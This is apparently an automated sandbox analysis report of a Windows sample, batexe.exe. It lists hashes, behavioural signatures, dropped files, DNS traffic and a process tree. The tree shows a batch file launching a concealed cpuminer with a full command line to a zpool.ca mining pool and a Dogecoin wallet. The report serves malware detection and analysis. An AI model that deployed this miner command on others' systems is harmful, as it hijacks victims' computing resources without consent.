73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
307s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21/02/2024, 05:54 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4652	b2e.exe
3956	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe
3956	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1552-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 1552 wrote to memory of 4652	1552	batexe.exe	73
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 4652 wrote to memory of 968	4652	b2e.exe	74
PID 968 wrote to memory of 3956	968	cmd.exe	77
PID 968 wrote to memory of 3956	968	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2D06.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3956

Network

DNS

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

Remote address:

8.8.8.8:53

Request

yespower.sea.mine.zpool.ca

IN A

Response

yespower.sea.mine.zpool.ca

IN A

198.50.168.213
DNS

213.168.50.198.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.168.50.198.in-addr.arpa

IN PTR

Response

213.168.50.198.in-addr.arpa

IN PTR

minezpoolca
DNS

89.16.208.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.16.208.104.in-addr.arpa

IN PTR

Response
DNS

180.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

180.178.17.96.in-addr.arpa

IN PTR

Response

180.178.17.96.in-addr.arpa

IN PTR

a96-17-178-180deploystaticakamaitechnologiescom

198.50.168.213:6234

yespower.sea.mine.zpool.ca

cpuminer-sse2.exe

3.4kB
6.9kB
44
44
127.0.0.1:49832

cpuminer-sse2.exe
127.0.0.1:49834

cpuminer-sse2.exe

8.8.8.8:53

yespower.sea.mine.zpool.ca

dns

cpuminer-sse2.exe

72 B
88 B
1
1

DNS Request

yespower.sea.mine.zpool.ca

DNS Response

198.50.168.213
8.8.8.8:53

213.168.50.198.in-addr.arpa

dns

73 B
100 B
1
1

DNS Request

213.168.50.198.in-addr.arpa
8.8.8.8:53

89.16.208.104.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

89.16.208.104.in-addr.arpa
8.8.8.8:53

180.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

180.178.17.96.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe

Filesize
2.1MB

MD5
4fc5f7fc35cd33c04b6017e17f28c6a6

SHA1
1412d47b5ad92b3012ff12947ac4f49bf501db2d

SHA256
8e2b49d4f5e14148d953ec8304369f86cae001604dd4acea187a9974a14dc0c8

SHA512
a9dc60bced019b66e9f1a3de74b367b9ad518e5a4fa1149368b81c7afad3ae67b1b2683658446300dd6d8274ffd95f30d0c03a8f0cfa16b1328c6b62c058d453

Download Submit
C:\Users\Admin\AppData\Local\Temp\2769.tmp\b2e.exe

Filesize
2.1MB

MD5
01270fed66a74509966146bd9506547f

SHA1
d76971cbe3b1ad6ac36d6ec0f3fc1c7ba12ab595

SHA256
292593a0386bc1a76533d44c5b2a26bcdfb2fb637e3e9a6f9a997164e89d2223

SHA512
9edea50b94a9bc6e676391ce27dc16ac6c83b9e0c0ffaef605080ec129117b7b92118931229c1e6f7d46f7de90fb314258e9d461dc2f8c24ab8c6dfc0d93ce57

Download Submit
C:\Users\Admin\AppData\Local\Temp\2D06.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
557KB

MD5
a71d08c5a2f9e95e555afc842b8d1ada

SHA1
412b246ea71471456c5cc944d6c26caa4144b220

SHA256
ca1a5d8577f32b63aedfddb24ede84da13c6cba6a8dbd8d4d0c6f7427e1e5535

SHA512
0d46de63347c7f68020a8bf7573894cb3eb1ed34dc9e5d895578b1234ef76187f076213a0511538a95c21cfa6bdd96e812f26d57beb8157287358ea295f4b914

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
510KB

MD5
cd84797c1ffbad998e763bf38734508c

SHA1
4685e33fa5686b7bf4f0c5f0766622467ad63582

SHA256
35156e2573253366c3a382c9ef33d5ba74fbb1fdfb0d306833cca9276434bc7b

SHA512
2e2e638a893aa704e5d0708abc96abd62bc94e1157346dac20b941df2302a92fa53550250e118a095854356cd2a3f6159ed237bec10e57e4566ea31d2e822152

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
464KB

MD5
fe4601b230cad455a36090e47229c384

SHA1
97a5e8d7824f9f2297ab295968748c024fb7afc7

SHA256
23bde80c5234774491e35e220384a621d8457414d2413167e9ce76f52ac4a16a

SHA512
a120662a01656084c241709c7f61452c1b06ed6b348e3e47696f50debceb94069a5f50b361a1c4cd8d8f5d1d7c09fbf414792562629f5f23d147dfdf70bf5340

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
342KB

MD5
4c06954ff5e9c68713d12ea35c28c17b

SHA1
1c284f934adaf833acf42bf37b2401eaf58efbbe

SHA256
528bcdaa9d746fe0a0c16e7cfd6cab75fc6ccb2f99d9bac8e7ea9110f28b1a2f

SHA512
52a0f25aea96dc3d4fd0cd62d7cc4f0e77d180e18359f1340a0b96932171fde6dedc32c1c5bb3878f8c9d4aaa3aa1a359ba674d0f15d87786ca18fd7afac5968

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
439KB

MD5
9a8a1e4910655bf270514d57b25f9fa6

SHA1
61ae39c4c1c9f72a88459deee4d889e7abec2689

SHA256
4237d565094da62f8e9e436cca9c396aac3328f8fd79e4f60cda281934889001

SHA512
897a0c8ec31d9500df02943c9192a89b2f17c81a27a70fa9b046fabb0ce49d2cc14729bb81422a32dc448e7cc132043a40df647d47874138fbbfe22cad0a9c9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
575KB

MD5
2fd94e6619b46650da078febbbd6741b

SHA1
7a4b6a0a9f8a0095bbb0e38a6506a90d55205acb

SHA256
8eba725996488024b77142e14e8872c2c114b902d11ef99b3a876f15e3f6f64b

SHA512
2af660575914b7232b5f3765d17b672b2c76e984da8ce90d062afe2a10df88a61149fb3888fa6ba56ce19a87f9e3fe3c982470e85a22caa360824dd9c4c87d81

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
455KB

MD5
62ee04658cae2b91c8b76eda091d232c

SHA1
da6b1e2a9e67283013ce89d9f33610e750730c91

SHA256
d144b7eb6de570736600a304649e37627e4ad770925e58edaeecbf93cbf90d3a

SHA512
95010741eaae66557dea6f80b52c0af712a4dfb2b08f07464b468bdc098391c741193cb3362f5c063b28d07a4b78153b276c23fb088b61cf13225be0d6111623

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
448KB

MD5
8185100383d0fe360c9198e5a883b08d

SHA1
ab398c469573f8e84d3cfcef01287a0604d6ab5f

SHA256
05ef7288b0d559bf67c3d69c201da9bdcaed0b49ecc538640f7b96c5b82eb538

SHA512
24930ef0caa1f2db2ed60f7dfdb832a172cf7747b0a336b051f73c0087a5f2fabff721487cb49cf5a3bc2be5426554b0a3a0e51541b6a4ca735646af24f1404a

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
556KB

MD5
d6fdadda056e36b85a930eb11847f03c

SHA1
f7afa0433d753d9ed93eef7c4d679039c902190d

SHA256
5e78bdf8470932b6daca1a8c776e8c4b2b15d01dc4841fb656810d326d0cbb9f

SHA512
869648c6b7346f5eb0bcf3810a1b3236b4bb73220be714af547a9d31200d358a9fd62f4a844b5ca03650cb7990ce944a636bb98c6f26f7f5994cb7582ea60527

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
508KB

MD5
275f274a6ecc2d06a5fa0dead7c2f18e

SHA1
b1805211f690ce8971404453a79638247ebce5af

SHA256
a193059e52db1619faae6d309f434d319f52f93485adb54208ede84cc78c617e

SHA512
5a4df07302a3a5d0515565002450f167c403edb000fe015f505b715905ad0cdf18ed7b40da00418e3e3a8e611fb6481c822dc20eaa655a2b28792eb23c167563

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
554KB

MD5
8fe0fd91d8ca713a37bdfbfcabaa6e2d

SHA1
d98a57e330b9387b4edc2c081fccb3514338d0ab

SHA256
db06b2058a9ab0ce28fd957cd564bff0a437bc980f59e6f1930e4a13cb01ee6e

SHA512
ecb1328c524f848a42c54f6d30339f84375b4e7c66d3157e032cdce1dac3304e43f0efa0fb6a06427f63f760d0893f59bf0ad624e9a55f51cb5c97554b32a9ee

Download Submit
memory/1552-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3956-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-42-0x000000005D8A0000-0x000000005D938000-memory.dmp

Filesize
608KB

Download
memory/3956-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3956-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/3956-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3956-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3956-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4652-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4652-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.